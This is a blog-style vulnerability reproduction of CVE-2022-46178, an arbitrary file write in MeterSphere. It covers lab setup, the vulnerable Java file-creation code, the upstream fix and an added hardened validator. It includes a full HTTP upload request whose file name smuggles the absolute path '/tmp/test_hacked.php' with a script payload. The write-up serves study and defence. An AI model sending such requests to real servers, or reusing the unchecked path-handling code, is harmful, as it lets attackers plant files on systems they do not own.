
[Vulnerability Reproduction] CVE-2022-46178 Arbitrary File Writing

2025/2/23 16:53:59  Source: https://blog.csdn.net/Mitchell_Donovan/article/details/144629769

Vulnerability Information

NVD - cve-2022-46178

MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.1 allow users to upload a file, but do not validate the file name, which may lead to upload file to any path. The vulnerability has been fixed in v2.5.1. There are no workarounds.

Background

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

Homepage: https://metersphere.io/

Source code: https://github.com/metersphere/metersphere

Environment Setup

$ wget https://github.com/metersphere/metersphere/releases/download/v2.10.1-lts/metersphere-online-installer-v2.10.1-lts.tar.gz --no-check-certificate
$ tar zxvf metersphere-online-installer-v2.10.1-lts.tar.gz
$ cd metersphere-online-installer-v2.10.1-lts
$ sudo ./install.sh
$ msctl status
Name                 Command                              State          Ports
--------------------------------------------------------------------------------------
api-test             /deployments/run-java.sh             Up (healthy)   0.0.0.0:10000->10000/tcp,:::10000->10000/tcp, 0.0.0.0:10001->10001/tcp,:::10001->10001/tcp, 0.0.0.0:10002->10002/tcp,:::10002->10002/tcp, 0.0.0.0:10003->10003/tcp,:::10003->10003/tcp, 0.0.0.0:10004->10004/tcp,:::10004->10004/tcp, 0.0.0.0:10005->10005/tcp,:::10005->10005/tcp, 0.0.0.0:10006->10006/tcp,:::10006->10006/tcp, 0.0.0.0:10007->10007/tcp,:::10007->10007/tcp, 0.0.0.0:10008->10008/tcp,:::10008->10008/tcp, 0.0.0.0:10009->10009/tcp,:::10009->10009/tcp, 0.0.0.0:10010->10010/tcp,:::10010->10010/tcp
eureka               /deployments/run-java.sh             Up (healthy)
gateway              /deployments/run-java.sh             Up (healthy)   0.0.0.0:8081->8000/tcp,:::8081->8000/tcp
kafka                /opt/bitnami/scripts/kafka ...       Up (healthy)   0.0.0.0:9092->9092/tcp,:::9092->9092/tcp
minio                /usr/bin/docker-entrypoint ...       Up (healthy)   0.0.0.0:9000->9000/tcp,:::9000->9000/tcp, 0.0.0.0:9001->9001/tcp,:::9001->9001/tcp
ms-data-streaming    /deployments/run-java.sh             Up (healthy)
ms-node-controller   sh -c sed -i "s/:101:/:136 ...       Up (healthy)   0.0.0.0:8082->8082/tcp,:::8082->8082/tcp, 0.0.0.0:9100->9100/tcp,:::9100->9100/tcp
ms-prometheus        /bin/prometheus --config.f ...       Up (healthy)   0.0.0.0:9091->9090/tcp,:::9091->9090/tcp
mysql                docker-entrypoint.sh mysqld          Up (healthy)   0.0.0.0:3306->3306/tcp,:::3306->3306/tcp, 33060/tcp
nodeexporter         /bin/node_exporter --path. ...       Up (healthy)
performance-test     /deployments/run-java.sh             Up (healthy)
project-management   /deployments/run-java.sh             Up (healthy)
redis                docker-entrypoint.sh redis ...       Up (healthy)   0.0.0.0:6379->6379/tcp,:::6379->6379/tcp
report-stat          /deployments/run-java.sh             Up (healthy)
system-setting       /deployments/run-java.sh             Up (healthy)
test-track           /deployments/run-java.sh             Up (healthy)
workstation          /deployments/run-java.sh             Up (healthy)

Debug1: If the Web UI returns {"success":false,"message":"401 UNAUTHORIZED \"Not found session, Please Login again.\"","data":null}, wait until every container is Up and healthy, then wait another 5 minutes before opening the Web UI (do not switch pages in the meantime).

Debug2: If port 9090 is already in use, change it to 9091 in docker-compose-prometheus.yml and install.conf.

# Debug3: Additionally
$ msctl restart gateway
$ msctl restart workstation
$ msctl restart prometheus

Web UI:http://127.0.0.1:8081

Account: admin, password: metersphere

Vulnerability Reproduction

Reference: https://github.com/metersphere/metersphere/security/advisories/GHSA-9p62-x3c5-hr5p

This vulnerability has many trigger points; the root cause is that the underlying file-creation function performs no validation of the path it is given, which the analysis below covers.

For example, create a new test instance on the performance-test page, following these steps:

(screenshot)

Here an upload request can be sent:

(screenshot)

Intercept and modify the request; the upload succeeds, and nothing checks the file name:

(screenshot)

POC:

POST /performance/project/upload/files/7a6e9276-bdb8-11ef-bcf6-0242ac1e0a07 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
CSRF-TOKEN: oklQnocyYFopwrJGK/cGxxWzJNdKvbw6jV5B1yeIcfFT57zVhHZkd494+5gX977DVo2myPZcL2stppCOwnW66w==
X-AUTH-TOKEN: c34a7ff5-53b1-44ff-bd53-c03fe5c7b148
WORKSPACE: 7a6e6750-bdb8-11ef-bcf6-0242ac1e0a07
PROJECT: 7a6e9276-bdb8-11ef-bcf6-0242ac1e0a07
Content-Type: multipart/form-data; boundary=---------------------------260742380731415149212240575586
Content-Length: 276
Origin: http://127.0.0.1:8081
Connection: keep-alive
Referer: http://127.0.0.1:8081/

-----------------------------260742380731415149212240575586
Content-Disposition: form-data; name="file"; filename="/tmp/test_hacked.php"
Content-Type: text/html

<script>alert("You are hacked!")</script>
-----------------------------260742380731415149212240575586--

Vulnerability Analysis

The vulnerable code is in framework/sdk-parent/sdk/src/main/java/io/metersphere/commons/utils/FileUtils.java#L57:

    public static void createFile(String filePath, byte[] fileBytes) {
        // filePath is used as given; nothing checks for separators, traversal,
        // or whether the result stays inside the intended upload directory.
        File file = new File(filePath);
        if (file.exists()) {
            file.delete();
        }
        try {
            File dir = file.getParentFile();
            if (!dir.exists()) {
                dir.mkdirs();   // creates any missing directories along the caller-supplied path
            }
            file.createNewFile();
        } catch (Exception e) {
            LogUtil.error(e);
        }
        try (InputStream in = new ByteArrayInputStream(fileBytes);
             OutputStream out = new FileOutputStream(file)) {
            final int MAX = 4096;
            byte[] buf = new byte[MAX];
            for (int bytesRead = in.read(buf, 0, MAX); bytesRead != -1; bytesRead = in.read(buf, 0, MAX)) {
                out.write(buf, 0, bytesRead);
            }
        } catch (IOException e) {
            LogUtil.error(e);
            MSException.throwException(Translator.get("upload_fail"));
        }
    }

Several other services call this function, which is why the vulnerability can be triggered from more than one endpoint:

(screenshot)

Fix

The patch adds validation of the uploaded file name: https://github.com/metersphere/metersphere/commit/3a890eeeb8a6b0887927c876a73bdb3a99a82138#diff-a099ade6eda784ae74aded98b0e9430b2cc21bc58aa7269922a234c3ea68192fR36
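To make the missing check concrete, the following is an added example of what file-name validation plus directory containment looks like for a function with the shape of createFile above. It is my own illustration, not the MeterSphere patch or project code; the class SafeFileWriter and its methods are hypothetical, and the inputs in main are constructed (the first is the file name from the PoC request, the second a relative traversal string, the third a benign name).

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

/**
 * Hypothetical hardened counterpart of FileUtils.createFile (added example,
 * not MeterSphere code). Two independent checks: the request-supplied name must
 * be a bare file name, and the resolved target must remain inside baseDir.
 */
public class SafeFileWriter {

    /** True only for a plain name: no separators, no traversal entries, no NUL, sane length. */
    static boolean isPlainFileName(String name) {
        if (name == null || name.isEmpty() || name.length() > 255) return false;
        if (name.equals(".") || name.equals("..")) return false;
        return name.indexOf('/') < 0 && name.indexOf('\\') < 0 && name.indexOf('\0') < 0;
    }

    /**
     * Resolves name under baseDir and verifies the normalized result still lies
     * inside baseDir. Throws IllegalArgumentException instead of writing outside.
     * (If baseDir may contain symlinked subdirectories, compare toRealPath() too.)
     */
    static Path resolveInside(Path baseDir, String name) {
        if (!isPlainFileName(name)) {
            throw new IllegalArgumentException("rejected file name: " + name);
        }
        Path base = baseDir.toAbsolutePath().normalize();
        Path target = base.resolve(name).normalize();
        // Path.startsWith compares whole path components, not string prefixes.
        if (!target.startsWith(base) || target.equals(base)) {
            throw new IllegalArgumentException("path escapes upload directory: " + name);
        }
        return target;
    }

    /** Creates or overwrites baseDir/name with bytes, only after both checks pass. */
    static Path createFile(Path baseDir, String name, byte[] bytes) throws IOException {
        Path target = resolveInside(baseDir, name);
        Files.createDirectories(target.getParent());
        // Files.write defaults to CREATE + TRUNCATE_EXISTING + WRITE, replacing the
        // delete / createNewFile / manual stream copy sequence of the original.
        Files.write(target, bytes);
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("upload-demo");
        // Constructed inputs: PoC file name, a traversal attempt, and a benign name.
        String[] names = { "/tmp/test_hacked.php", "../outside.txt", "report.jmx" };
        byte[] body = "<script>alert(1)</script>".getBytes(StandardCharsets.UTF_8);
        for (String n : names) {
            try {
                Path written = createFile(base, n, body);
                System.out.println("accepted: " + n + " -> " + written);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Run with `javac SafeFileWriter.java && java SafeFileWriter`: the first two names are rejected before any filesystem call, and only report.jmx is written, under the temporary base directory. Keeping the name check separate from the containment check matters: the first gives a clear error for the common case, while the second still catches anything a future caller passes in that bypasses the name check.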
